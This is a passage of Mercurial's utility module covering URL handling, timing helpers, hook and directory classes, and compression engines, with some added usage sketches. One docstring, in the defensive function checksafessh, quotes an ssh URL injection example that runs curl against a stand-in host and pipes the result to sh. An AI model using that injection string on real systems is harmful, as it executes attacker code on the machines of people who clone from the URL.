2724 2745 if (self.host and self.scheme == 'file' and
2725 2746 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2726 2747 raise error.Abort(_('file:// URLs can only refer to localhost'))
2727 2748
2728 2749 self.path = path
2729 2750
2730 2751 # leave the query string escaped
2731 2752 for a in ('user', 'passwd', 'host', 'port',
2732 2753 'path', 'fragment'):
2733 2754 v = getattr(self, a)
2734 2755 if v is not None:
2735 2756 setattr(self, a, urlreq.unquote(v))
2736 2757
2737 2758 @encoding.strmethod
2738 2759 def __repr__(self):
2739 2760 attrs = []
2740 2761 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2741 2762 'query', 'fragment'):
2742 2763 v = getattr(self, a)
2743 2764 if v is not None:
2744 2765 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2745 2766 return '<url %s>' % ', '.join(attrs)
2746 2767
2747 2768 def __bytes__(self):
2748 2769 r"""Join the URL's components back into a URL string.
2749 2770
2750 2771 Examples:
2751 2772
2752 2773 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2753 2774 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2754 2775 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2755 2776 'http://user:pw@host:80/?foo=bar&baz=42'
2756 2777 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2757 2778 'http://user:pw@host:80/?foo=bar%3dbaz'
2758 2779 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2759 2780 'ssh://user:pw@[::1]:2200//home/joe#'
2760 2781 >>> bytes(url(b'http://localhost:80//'))
2761 2782 'http://localhost:80//'
2762 2783 >>> bytes(url(b'http://localhost:80/'))
2763 2784 'http://localhost:80/'
2764 2785 >>> bytes(url(b'http://localhost:80'))
2765 2786 'http://localhost:80/'
2766 2787 >>> bytes(url(b'bundle:foo'))
2767 2788 'bundle:foo'
2768 2789 >>> bytes(url(b'bundle://../foo'))
2769 2790 'bundle:../foo'
2770 2791 >>> bytes(url(b'path'))
2771 2792 'path'
2772 2793 >>> bytes(url(b'file:///tmp/foo/bar'))
2773 2794 'file:///tmp/foo/bar'
2774 2795 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2775 2796 'file:///c:/tmp/foo/bar'
2776 2797 >>> print(url(br'bundle:foo\bar'))
2777 2798 bundle:foo\bar
2778 2799 >>> print(url(br'file:///D:\data\hg'))
2779 2800 file:///D:\data\hg
2780 2801 """
2781 2802 if self._localpath:
2782 2803 s = self.path
2783 2804 if self.scheme == 'bundle':
2784 2805 s = 'bundle:' + s
2785 2806 if self.fragment:
2786 2807 s += '#' + self.fragment
2787 2808 return s
2788 2809
2789 2810 s = self.scheme + ':'
2790 2811 if self.user or self.passwd or self.host:
2791 2812 s += '//'
2792 2813 elif self.scheme and (not self.path or self.path.startswith('/')
2793 2814 or hasdriveletter(self.path)):
2794 2815 s += '//'
2795 2816 if hasdriveletter(self.path):
2796 2817 s += '/'
2797 2818 if self.user:
2798 2819 s += urlreq.quote(self.user, safe=self._safechars)
2799 2820 if self.passwd:
2800 2821 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2801 2822 if self.user or self.passwd:
2802 2823 s += '@'
2803 2824 if self.host:
2804 2825 if not (self.host.startswith('[') and self.host.endswith(']')):
2805 2826 s += urlreq.quote(self.host)
2806 2827 else:
2807 2828 s += self.host
2808 2829 if self.port:
2809 2830 s += ':' + urlreq.quote(self.port)
2810 2831 if self.host:
2811 2832 s += '/'
2812 2833 if self.path:
2813 2834 # TODO: similar to the query string, we should not unescape the
2814 2835 # path when we store it, the path might contain '%2f' = '/',
2815 2836 # which we should *not* escape.
2816 2837 s += urlreq.quote(self.path, safe=self._safepchars)
2817 2838 if self.query:
2818 2839 # we store the query in escaped form.
2819 2840 s += '?' + self.query
2820 2841 if self.fragment is not None:
2821 2842 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2822 2843 return s
2823 2844
2824 2845 __str__ = encoding.strmethod(__bytes__)
2825 2846
2826 2847 def authinfo(self):
2827 2848 user, passwd = self.user, self.passwd
2828 2849 try:
2829 2850 self.user, self.passwd = None, None
2830 2851 s = bytes(self)
2831 2852 finally:
2832 2853 self.user, self.passwd = user, passwd
2833 2854 if not self.user:
2834 2855 return (s, None)
2835 2856 # authinfo[1] is passed to urllib2 password manager, and its
2836 2857 # URIs must not contain credentials. The host is passed in the
2837 2858 # URIs list because Python < 2.4.3 uses only that to search for
2838 2859 # a password.
2839 2860 return (s, (None, (s, self.host),
2840 2861 self.user, self.passwd or ''))
2841 2862
2842 2863 def isabs(self):
2843 2864 if self.scheme and self.scheme != 'file':
2844 2865 return True # remote URL
2845 2866 if hasdriveletter(self.path):
2846 2867 return True # absolute for our purposes - can't be joined()
2847 2868 if self.path.startswith(br'\\'):
2848 2869 return True # Windows UNC path
2849 2870 if self.path.startswith('/'):
2850 2871 return True # POSIX-style
2851 2872 return False
2852 2873
2853 2874 def localpath(self):
2854 2875 if self.scheme == 'file' or self.scheme == 'bundle':
2855 2876 path = self.path or '/'
2856 2877 # For Windows, we need to promote hosts containing drive
2857 2878 # letters to paths with drive letters.
2858 2879 if hasdriveletter(self._hostport):
2859 2880 path = self._hostport + '/' + self.path
2860 2881 elif (self.host is not None and self.path
2861 2882 and not hasdriveletter(path)):
2862 2883 path = '/' + path
2863 2884 return path
2864 2885 return self._origpath
2865 2886
2866 2887 def islocal(self):
2867 2888 '''whether localpath will return something that posixfile can open'''
2868 2889 return (not self.scheme or self.scheme == 'file'
2869 2890 or self.scheme == 'bundle')
2870 2891
2871 2892 def hasscheme(path):
2872 2893 return bool(url(path).scheme)
2873 2894
2874 2895 def hasdriveletter(path):
2875 2896 return path and path[1:2] == ':' and path[0:1].isalpha()
2876 2897
2877 2898 def urllocalpath(path):
2878 2899 return url(path, parsequery=False, parsefragment=False).localpath()
2879 2900
2880 2901 def checksafessh(path):
2881 2902 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2882 2903
2883 2904 This is a sanity check for ssh urls. ssh will parse the first item as
2884 2905 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2885 2906 Let's prevent these potentially exploited urls entirely and warn the
2886 2907 user.
2887 2908
2888 2909 Raises an error.Abort when the url is unsafe.
2889 2910 """
2890 2911 path = urlreq.unquote(path)
2891 2912 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2892 2913 raise error.Abort(_('potentially unsafe url: %r') %
2893 2914 (pycompat.bytestr(path),))
2894 2915
2895 2916 def hidepassword(u):
2896 2917 '''hide user credential in a url string'''
2897 2918 u = url(u)
2898 2919 if u.passwd:
2899 2920 u.passwd = '***'
2900 2921 return bytes(u)
2901 2922
2902 2923 def removeauth(u):
2903 2924 '''remove all authentication information from a url string'''
2904 2925 u = url(u)
2905 2926 u.user = u.passwd = None
2906 2927 return bytes(u)
2907 2928
2908 2929 timecount = unitcountfn(
2909 2930 (1, 1e3, _('%.0f s')),
2910 2931 (100, 1, _('%.1f s')),
2911 2932 (10, 1, _('%.2f s')),
2912 2933 (1, 1, _('%.3f s')),
2913 2934 (100, 0.001, _('%.1f ms')),
2914 2935 (10, 0.001, _('%.2f ms')),
2915 2936 (1, 0.001, _('%.3f ms')),
2916 2937 (100, 0.000001, _('%.1f us')),
2917 2938 (10, 0.000001, _('%.2f us')),
2918 2939 (1, 0.000001, _('%.3f us')),
2919 2940 (100, 0.000000001, _('%.1f ns')),
2920 2941 (10, 0.000000001, _('%.2f ns')),
2921 2942 (1, 0.000000001, _('%.3f ns')),
2922 2943 )
2923 2944
2924 2945 @attr.s
2925 2946 class timedcmstats(object):
2926 2947 """Stats information produced by the timedcm context manager on entering."""
2927 2948
2928 2949 # the starting value of the timer as a float (meaning and resolution
2929 2950 # are platform dependent, see util.timer)
2930 2951 start = attr.ib(default=attr.Factory(lambda: timer()))
2931 2952 # the number of seconds as a floating point value; starts at 0, updated when
2932 2953 # the context is exited.
2933 2954 elapsed = attr.ib(default=0)
2934 2955 # the number of nested timedcm context managers.
2935 2956 level = attr.ib(default=1)
2936 2957
2937 2958 def __bytes__(self):
2938 2959 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2939 2960
2940 2961 __str__ = encoding.strmethod(__bytes__)
2941 2962
2942 2963 @contextlib.contextmanager
2943 2964 def timedcm(whencefmt, *whenceargs):
2944 2965 """A context manager that produces timing information for a given context.
2945 2966
2946 2967 On entering, a timedcmstats instance is produced.
2947 2968
2948 2969 This context manager is reentrant.
2949 2970
2950 2971 """
2951 2972 # track nested context managers
2952 2973 timedcm._nested += 1
2953 2974 timing_stats = timedcmstats(level=timedcm._nested)
2954 2975 try:
2955 2976 with tracing.log(whencefmt, *whenceargs):
2956 2977 yield timing_stats
2957 2978 finally:
2958 2979 timing_stats.elapsed = timer() - timing_stats.start
2959 2980 timedcm._nested -= 1
2960 2981
2961 2982 timedcm._nested = 0
2962 2983
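A minimal usage sketch (the format string and the workload are hypothetical):

    with timedcm('loading %s', 'manifest') as stats:
        load_manifest()              # hypothetical timed work
    # stats.elapsed now holds the duration in seconds;
    # bytes(stats) renders it via timecount, e.g. '4.200 ms'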
2963 2984 def timed(func):
2964 2985 '''Report the execution time of a function call to stderr.
2965 2986
2966 2987 During development, use as a decorator when you need to measure
2967 2988 the cost of a function, e.g. as follows:
2968 2989
2969 2990 @util.timed
2970 2991 def foo(a, b, c):
2971 2992 pass
2972 2993 '''
2973 2994
2974 2995 def wrapper(*args, **kwargs):
2975 2996 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2976 2997 result = func(*args, **kwargs)
2977 2998 stderr = procutil.stderr
2978 2999 stderr.write('%s%s: %s\n' % (
2979 3000 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
2980 3001 time_stats))
2981 3002 return result
2982 3003 return wrapper
2983 3004
2984 3005 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2985 3006 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2986 3007
2987 3008 def sizetoint(s):
2988 3009 '''Convert a space specifier to a byte count.
2989 3010
2990 3011 >>> sizetoint(b'30')
2991 3012 30
2992 3013 >>> sizetoint(b'2.2kb')
2993 3014 2252
2994 3015 >>> sizetoint(b'6M')
2995 3016 6291456
2996 3017 '''
2997 3018 t = s.strip().lower()
2998 3019 try:
2999 3020 for k, u in _sizeunits:
3000 3021 if t.endswith(k):
3001 3022 return int(float(t[:-len(k)]) * u)
3002 3023 return int(t)
3003 3024 except ValueError:
3004 3025 raise error.ParseError(_("couldn't parse size: %s") % s)
3005 3026
3006 3027 class hooks(object):
3007 3028 '''A collection of hook functions that can be used to extend a
3008 3029 function's behavior. Hooks are called in lexicographic order,
3009 3030 based on the names of their sources.'''
3010 3031
3011 3032 def __init__(self):
3012 3033 self._hooks = []
3013 3034
3014 3035 def add(self, source, hook):
3015 3036 self._hooks.append((source, hook))
3016 3037
3017 3038 def __call__(self, *args):
3018 3039 self._hooks.sort(key=lambda x: x[0])
3019 3040 results = []
3020 3041 for source, hook in self._hooks:
3021 3042 results.append(hook(*args))
3022 3043 return results
3023 3044
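A minimal usage sketch (the source names and hook bodies are hypothetical):

    myhooks = hooks()
    myhooks.add('zz-ext', lambda v: v + 1)
    myhooks.add('aa-ext', lambda v: v * 2)
    myhooks(10)   # -> [20, 11]: 'aa-ext' sorts first, so it runs first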
3024 3045 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3025 3046 '''Yields lines for a nicely formatted stacktrace.
3026 3047 Skips the 'skip' last entries, then returns the last 'depth' entries.
3027 3048 Each file+linenumber is formatted according to fileline.
3028 3049 Each line is formatted according to line.
3029 3050 If line is None, it yields:
3030 3051 length of longest filepath+line number,
3031 3052 filepath+linenumber,
3032 3053 function
3033 3054
3034 3055 Not to be used in production code, but very convenient while developing.
3035 3056 '''
3036 3057 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3037 3058 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3038 3059 ][-depth:]
3039 3060 if entries:
3040 3061 fnmax = max(len(entry[0]) for entry in entries)
3041 3062 for fnln, func in entries:
3042 3063 if line is None:
3043 3064 yield (fnmax, fnln, func)
3044 3065 else:
3045 3066 yield line % (fnmax, fnln, func)
3046 3067
3047 3068 def debugstacktrace(msg='stacktrace', skip=0,
3048 3069 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3049 3070 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3050 3071 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3051 3072 By default it will flush stdout first.
3052 3073 It can be used everywhere and intentionally does not require an ui object.
3053 3074 Not be used in production code but very convenient while developing.
3054 3075 '''
3055 3076 if otherf:
3056 3077 otherf.flush()
3057 3078 f.write('%s at:\n' % msg.rstrip())
3058 3079 for line in getstackframes(skip + 1, depth=depth):
3059 3080 f.write(line)
3060 3081 f.flush()
3061 3082
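A usage sketch; the stderr output shown is only indicative of the format:

    def processfile(path):
        debugstacktrace(b'processing %s' % path, depth=2)
    # writes something like:
    #   processing foo.txt at:
    #    script.py:12 in <module>
    #    script.py:9 in processfile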
3062 3083 class dirs(object):
3063 3084 '''a multiset of directory names from a dirstate or manifest'''
3064 3085
3065 3086 def __init__(self, map, skip=None):
3066 3087 self._dirs = {}
3067 3088 addpath = self.addpath
3068 3089 if safehasattr(map, 'iteritems') and skip is not None:
3069 3090 for f, s in map.iteritems():
3070 3091 if s[0] != skip:
3071 3092 addpath(f)
3072 3093 else:
3073 3094 for f in map:
3074 3095 addpath(f)
3075 3096
3076 3097 def addpath(self, path):
3077 3098 dirs = self._dirs
3078 3099 for base in finddirs(path):
3079 3100 if base in dirs:
3080 3101 dirs[base] += 1
3081 3102 return
3082 3103 dirs[base] = 1
3083 3104
3084 3105 def delpath(self, path):
3085 3106 dirs = self._dirs
3086 3107 for base in finddirs(path):
3087 3108 if dirs[base] > 1:
3088 3109 dirs[base] -= 1
3089 3110 return
3090 3111 del dirs[base]
3091 3112
3092 3113 def __iter__(self):
3093 3114 return iter(self._dirs)
3094 3115
3095 3116 def __contains__(self, d):
3096 3117 return d in self._dirs
3097 3118
3098 3119 if safehasattr(parsers, 'dirs'):
3099 3120 dirs = parsers.dirs
3100 3121
3101 3122 def finddirs(path):
3102 3123 pos = path.rfind('/')
3103 3124 while pos != -1:
3104 3125 yield path[:pos]
3105 3126 pos = path.rfind('/', 0, pos)
3106 3127
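A sketch of the pure-Python fallback above (used when the C parsers.dirs is unavailable); the paths are illustrative:

    list(finddirs('a/b/c'))    # -> ['a/b', 'a']: ancestors, deepest first
    d = dirs(['a/b/c', 'a/d'])
    'a' in d                   # -> True
    d.delpath('a/d')
    'a' in d                   # -> True: 'a' still covers 'a/b/c'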
3107 3128 # compression code
3108 3129
3109 3130 SERVERROLE = 'server'
3110 3131 CLIENTROLE = 'client'
3111 3132
3112 3133 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3113 3134 (u'name', u'serverpriority',
3114 3135 u'clientpriority'))
3115 3136
3116 3137 class compressormanager(object):
3117 3138 """Holds registrations of various compression engines.
3118 3139
3119 3140 This class essentially abstracts the differences between compression
3120 3141 engines to allow new compression formats to be added easily, possibly from
3121 3142 extensions.
3122 3143
3123 3144 Compressors are registered against the global instance by calling its
3124 3145 ``register()`` method.
3125 3146 """
3126 3147 def __init__(self):
3127 3148 self._engines = {}
3128 3149 # Bundle spec human name to engine name.
3129 3150 self._bundlenames = {}
3130 3151 # Internal bundle identifier to engine name.
3131 3152 self._bundletypes = {}
3132 3153 # Revlog header to engine name.
3133 3154 self._revlogheaders = {}
3134 3155 # Wire proto identifier to engine name.
3135 3156 self._wiretypes = {}
3136 3157
3137 3158 def __getitem__(self, key):
3138 3159 return self._engines[key]
3139 3160
3140 3161 def __contains__(self, key):
3141 3162 return key in self._engines
3142 3163
3143 3164 def __iter__(self):
3144 3165 return iter(self._engines.keys())
3145 3166
3146 3167 def register(self, engine):
3147 3168 """Register a compression engine with the manager.
3148 3169
3149 3170 The argument must be a ``compressionengine`` instance.
3150 3171 """
3151 3172 if not isinstance(engine, compressionengine):
3152 3173 raise ValueError(_('argument must be a compressionengine'))
3153 3174
3154 3175 name = engine.name()
3155 3176
3156 3177 if name in self._engines:
3157 3178 raise error.Abort(_('compression engine %s already registered') %
3158 3179 name)
3159 3180
3160 3181 bundleinfo = engine.bundletype()
3161 3182 if bundleinfo:
3162 3183 bundlename, bundletype = bundleinfo
3163 3184
3164 3185 if bundlename in self._bundlenames:
3165 3186 raise error.Abort(_('bundle name %s already registered') %
3166 3187 bundlename)
3167 3188 if bundletype in self._bundletypes:
3168 3189 raise error.Abort(_('bundle type %s already registered by %s') %
3169 3190 (bundletype, self._bundletypes[bundletype]))
3170 3191
3171 3192 # No external facing name declared.
3172 3193 if bundlename:
3173 3194 self._bundlenames[bundlename] = name
3174 3195
3175 3196 self._bundletypes[bundletype] = name
3176 3197
3177 3198 wiresupport = engine.wireprotosupport()
3178 3199 if wiresupport:
3179 3200 wiretype = wiresupport.name
3180 3201 if wiretype in self._wiretypes:
3181 3202 raise error.Abort(_('wire protocol compression %s already '
3182 3203 'registered by %s') %
3183 3204 (wiretype, self._wiretypes[wiretype]))
3184 3205
3185 3206 self._wiretypes[wiretype] = name
3186 3207
3187 3208 revlogheader = engine.revlogheader()
3188 3209 if revlogheader and revlogheader in self._revlogheaders:
3189 3210 raise error.Abort(_('revlog header %s already registered by %s') %
3190 3211 (revlogheader, self._revlogheaders[revlogheader]))
3191 3212
3192 3213 if revlogheader:
3193 3214 self._revlogheaders[revlogheader] = name
3194 3215
3195 3216 self._engines[name] = engine
3196 3217
3197 3218 @property
3198 3219 def supportedbundlenames(self):
3199 3220 return set(self._bundlenames.keys())
3200 3221
3201 3222 @property
3202 3223 def supportedbundletypes(self):
3203 3224 return set(self._bundletypes.keys())
3204 3225
3205 3226 def forbundlename(self, bundlename):
3206 3227 """Obtain a compression engine registered to a bundle name.
3207 3228
3208 3229 Will raise KeyError if the bundle type isn't registered.
3209 3230
3210 3231 Will abort if the engine is known but not available.
3211 3232 """
3212 3233 engine = self._engines[self._bundlenames[bundlename]]
3213 3234 if not engine.available():
3214 3235 raise error.Abort(_('compression engine %s could not be loaded') %
3215 3236 engine.name())
3216 3237 return engine
3217 3238
3218 3239 def forbundletype(self, bundletype):
3219 3240 """Obtain a compression engine registered to a bundle type.
3220 3241
3221 3242 Will raise KeyError if the bundle type isn't registered.
3222 3243
3223 3244 Will abort if the engine is known but not available.
3224 3245 """
3225 3246 engine = self._engines[self._bundletypes[bundletype]]
3226 3247 if not engine.available():
3227 3248 raise error.Abort(_('compression engine %s could not be loaded') %
3228 3249 engine.name())
3229 3250 return engine
3230 3251
3231 3252 def supportedwireengines(self, role, onlyavailable=True):
3232 3253 """Obtain compression engines that support the wire protocol.
3233 3254
3234 3255 Returns a list of engines in prioritized order, most desired first.
3235 3256
3236 3257 If ``onlyavailable`` is set, filter out engines that can't be
3237 3258 loaded.
3238 3259 """
3239 3260 assert role in (SERVERROLE, CLIENTROLE)
3240 3261
3241 3262 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3242 3263
3243 3264 engines = [self._engines[e] for e in self._wiretypes.values()]
3244 3265 if onlyavailable:
3245 3266 engines = [e for e in engines if e.available()]
3246 3267
3247 3268 def getkey(e):
3248 3269 # Sort first by priority, highest first. In case of tie, sort
3249 3270 # alphabetically. This is arbitrary, but ensures output is
3250 3271 # stable.
3251 3272 w = e.wireprotosupport()
3252 3273 return -1 * getattr(w, attr), w.name
3253 3274
3254 3275 return list(sorted(engines, key=getkey))
3255 3276
3256 3277 def forwiretype(self, wiretype):
3257 3278 engine = self._engines[self._wiretypes[wiretype]]
3258 3279 if not engine.available():
3259 3280 raise error.Abort(_('compression engine %s could not be loaded') %
3260 3281 engine.name())
3261 3282 return engine
3262 3283
3263 3284 def forrevlogheader(self, header):
3264 3285 """Obtain a compression engine registered to a revlog header.
3265 3286
3266 3287 Will raise KeyError if the revlog header value isn't registered.
3267 3288 """
3268 3289 return self._engines[self._revlogheaders[header]]
3269 3290
3270 3291 compengines = compressormanager()
3271 3292
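A sketch of consuming the global registry; the engine and bundle names used are those registered further down in this module:

    engine = compengines['zlib']                # lookup by engine name
    engine = compengines.forbundlename('gzip')  # by bundle spec name
    engine = compengines.forbundletype('GZ')    # by internal bundle id
    data = b''.join(engine.compressstream([b'chunk1', b'chunk2']))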
3272 3293 class compressionengine(object):
3273 3294 """Base class for compression engines.
3274 3295
3275 3296 Compression engines must implement the interface defined by this class.
3276 3297 """
3277 3298 def name(self):
3278 3299 """Returns the name of the compression engine.
3279 3300
3280 3301 This is the key the engine is registered under.
3281 3302
3282 3303 This method must be implemented.
3283 3304 """
3284 3305 raise NotImplementedError()
3285 3306
3286 3307 def available(self):
3287 3308 """Whether the compression engine is available.
3288 3309
3289 3310 The intent of this method is to allow optional compression engines
3290 3311 that may not be available in all installations (such as engines relying
3291 3312 on C extensions that may not be present).
3292 3313 """
3293 3314 return True
3294 3315
3295 3316 def bundletype(self):
3296 3317 """Describes bundle identifiers for this engine.
3297 3318
3298 3319 If this compression engine isn't supported for bundles, returns None.
3299 3320
3300 3321 If this engine can be used for bundles, returns a 2-tuple of strings of
3301 3322 the user-facing "bundle spec" compression name and an internal
3302 3323 identifier used to denote the compression format within bundles. To
3303 3324 exclude the name from external usage, set the first element to ``None``.
3304 3325
3305 3326 If bundle compression is supported, the class must also implement
3306 3327 ``compressstream`` and ``decompressorreader``.
3307 3328
3308 3329 The docstring of this method is used in the help system to tell users
3309 3330 about this engine.
3310 3331 """
3311 3332 return None
3312 3333
3313 3334 def wireprotosupport(self):
3314 3335 """Declare support for this compression format on the wire protocol.
3315 3336
3316 3337 If this compression engine isn't supported for compressing wire
3317 3338 protocol payloads, returns None.
3318 3339
3319 3340 Otherwise, returns ``compenginewireprotosupport`` with the following
3320 3341 fields:
3321 3342
3322 3343 * String format identifier
3323 3344 * Integer priority for the server
3324 3345 * Integer priority for the client
3325 3346
3326 3347 The integer priorities are used to order the advertisement of format
3327 3348 support by server and client. The highest integer is advertised
3328 3349 first. Integers with non-positive values aren't advertised.
3329 3350
3330 3351 The priority values are somewhat arbitrary and only used for default
3331 3352 ordering. The relative order can be changed via config options.
3332 3353
3333 3354 If wire protocol compression is supported, the class must also implement
3334 3355 ``compressstream`` and ``decompressorreader``.
3335 3356 """
3336 3357 return None
3337 3358
3338 3359 def revlogheader(self):
3339 3360 """Header added to revlog chunks that identifies this engine.
3340 3361
3341 3362 If this engine can be used to compress revlogs, this method should
3342 3363 return the bytes used to identify chunks compressed with this engine.
3343 3364 Else, the method should return ``None`` to indicate it does not
3344 3365 participate in revlog compression.
3345 3366 """
3346 3367 return None
3347 3368
3348 3369 def compressstream(self, it, opts=None):
3349 3370 """Compress an iterator of chunks.
3350 3371
3351 3372 The method receives an iterator (ideally a generator) of chunks of
3352 3373 bytes to be compressed. It returns an iterator (ideally a generator)
3353 3374 of chunks of bytes representing the compressed output.
3354 3375
3355 3376 Optionally accepts an argument defining how to perform compression.
3356 3377 Each engine treats this argument differently.
3357 3378 """
3358 3379 raise NotImplementedError()
3359 3380
3360 3381 def decompressorreader(self, fh):
3361 3382 """Perform decompression on a file object.
3362 3383
3363 3384 Argument is an object with a ``read(size)`` method that returns
3364 3385 compressed data. Return value is an object with a ``read(size)`` that
3365 3386 returns uncompressed data.
3366 3387 """
3367 3388 raise NotImplementedError()
3368 3389
3369 3390 def revlogcompressor(self, opts=None):
3370 3391 """Obtain an object that can be used to compress revlog entries.
3371 3392
3372 3393 The object has a ``compress(data)`` method that compresses binary
3373 3394 data. This method returns compressed binary data or ``None`` if
3374 3395 the data could not be compressed (too small, not compressible, etc).
3375 3396 The returned data should have a header uniquely identifying this
3376 3397 compression format so decompression can be routed to this engine.
3377 3398 This header should be identified by the ``revlogheader()`` return
3378 3399 value.
3379 3400
3380 3401 The object has a ``decompress(data)`` method that decompresses
3381 3402 data. The method will only be called if ``data`` begins with
3382 3403 ``revlogheader()``. The method should return the raw, uncompressed
3383 3404 data or raise a ``RevlogError``.
3384 3405
3385 3406 The object is reusable but is not thread safe.
3386 3407 """
3387 3408 raise NotImplementedError()
3388 3409
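As a sketch of the minimum the interface above requires, a hypothetical pass-through engine needs only a name and the two stream methods; the other methods default to "not supported":

    class _identityengine(compressionengine):  # hypothetical example
        def name(self):
            return 'identity'
        def compressstream(self, it, opts=None):
            return it   # chunks pass through unmodified
        def decompressorreader(self, fh):
            return fh

    compengines.register(_identityengine())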
3389 3410 class _CompressedStreamReader(object):
3390 3411 def __init__(self, fh):
3391 3412 if safehasattr(fh, 'unbufferedread'):
3392 3413 self._reader = fh.unbufferedread
3393 3414 else:
3394 3415 self._reader = fh.read
3395 3416 self._pending = []
3396 3417 self._pos = 0
3397 3418 self._eof = False
3398 3419
3399 3420 def _decompress(self, chunk):
3400 3421 raise NotImplementedError()
3401 3422
3402 3423 def read(self, l):
3403 3424 buf = []
3404 3425 while True:
3405 3426 while self._pending:
3406 3427 if len(self._pending[0]) > l + self._pos:
3407 3428 newbuf = self._pending[0]
3408 3429 buf.append(newbuf[self._pos:self._pos + l])
3409 3430 self._pos += l
3410 3431 return ''.join(buf)
3411 3432
3412 3433 newbuf = self._pending.pop(0)
3413 3434 if self._pos:
3414 3435 buf.append(newbuf[self._pos:])
3415 3436 l -= len(newbuf) - self._pos
3416 3437 else:
3417 3438 buf.append(newbuf)
3418 3439 l -= len(newbuf)
3419 3440 self._pos = 0
3420 3441
3421 3442 if self._eof:
3422 3443 return ''.join(buf)
3423 3444 chunk = self._reader(65536)
3424 3445 self._decompress(chunk)
3425 3446 if not chunk and not self._pending and not self._eof:
3426 3447 # No progress and no new data, bail out
3427 3448 return ''.join(buf)
3428 3449
3429 3450 class _GzipCompressedStreamReader(_CompressedStreamReader):
3430 3451 def __init__(self, fh):
3431 3452 super(_GzipCompressedStreamReader, self).__init__(fh)
3432 3453 self._decompobj = zlib.decompressobj()
3433 3454 def _decompress(self, chunk):
3434 3455 newbuf = self._decompobj.decompress(chunk)
3435 3456 if newbuf:
3436 3457 self._pending.append(newbuf)
3437 3458 d = self._decompobj.copy() # probe a copy with junk to detect stream end
3438 3459 try:
3439 3460 d.decompress('x')
3440 3461 d.flush()
3441 3462 if d.unused_data == 'x':
3442 3463 self._eof = True
3443 3464 except zlib.error:
3444 3465 pass
3445 3466
3446 3467 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3447 3468 def __init__(self, fh):
3448 3469 super(_BZ2CompressedStreamReader, self).__init__(fh)
3449 3470 self._decompobj = bz2.BZ2Decompressor()
3450 3471 def _decompress(self, chunk):
3451 3472 newbuf = self._decompobj.decompress(chunk)
3452 3473 if newbuf:
3453 3474 self._pending.append(newbuf)
3454 3475 try:
3455 3476 while True:
3456 3477 newbuf = self._decompobj.decompress('')
3457 3478 if newbuf:
3458 3479 self._pending.append(newbuf)
3459 3480 else:
3460 3481 break
3461 3482 except EOFError:
3462 3483 self._eof = True
3463 3484
3464 3485 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3465 3486 def __init__(self, fh):
3466 3487 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3467 3488 newbuf = self._decompobj.decompress('BZ')
3468 3489 if newbuf:
3469 3490 self._pending.append(newbuf)
3470 3491
3471 3492 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3472 3493 def __init__(self, fh, zstd):
3473 3494 super(_ZstdCompressedStreamReader, self).__init__(fh)
3474 3495 self._zstd = zstd
3475 3496 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3476 3497 def _decompress(self, chunk):
3477 3498 newbuf = self._decompobj.decompress(chunk)
3478 3499 if newbuf:
3479 3500 self._pending.append(newbuf)
3480 3501 try:
3481 3502 while True:
3482 3503 newbuf = self._decompobj.decompress('')
3483 3504 if newbuf:
3484 3505 self._pending.append(newbuf)
3485 3506 else:
3486 3507 break
3487 3508 except self._zstd.ZstdError:
3488 3509 self._eof = True
3489 3510
3490 3511 class _zlibengine(compressionengine):
3491 3512 def name(self):
3492 3513 return 'zlib'
3493 3514
3494 3515 def bundletype(self):
3495 3516 """zlib compression using the DEFLATE algorithm.
3496 3517
3497 3518 All Mercurial clients should support this format. The compression
3498 3519 algorithm strikes a reasonable balance between compression ratio
3499 3520 and speed.
3500 3521 """
3501 3522 return 'gzip', 'GZ'
3502 3523
3503 3524 def wireprotosupport(self):
3504 3525 return compewireprotosupport('zlib', 20, 20)
3505 3526
3506 3527 def revlogheader(self):
3507 3528 return 'x'
3508 3529
3509 3530 def compressstream(self, it, opts=None):
3510 3531 opts = opts or {}
3511 3532
3512 3533 z = zlib.compressobj(opts.get('level', -1))
3513 3534 for chunk in it:
3514 3535 data = z.compress(chunk)
3515 3536 # Not all calls to compress emit data. It is cheaper to inspect
3516 3537 # here than to feed empty chunks through generator.
3517 3538 if data:
3518 3539 yield data
3519 3540
3520 3541 yield z.flush()
3521 3542
3522 3543 def decompressorreader(self, fh):
3523 3544 return _GzipCompressedStreamReader(fh)
3524 3545
3525 3546 class zlibrevlogcompressor(object):
3526 3547 def compress(self, data):
3527 3548 insize = len(data)
3528 3549 # Caller handles empty input case.
3529 3550 assert insize > 0
3530 3551
3531 3552 if insize < 44:
3532 3553 return None
3533 3554
3534 3555 elif insize <= 1000000:
3535 3556 compressed = zlib.compress(data)
3536 3557 if len(compressed) < insize:
3537 3558 return compressed
3538 3559 return None
3539 3560
3540 3561 # zlib makes an internal copy of the input buffer, doubling
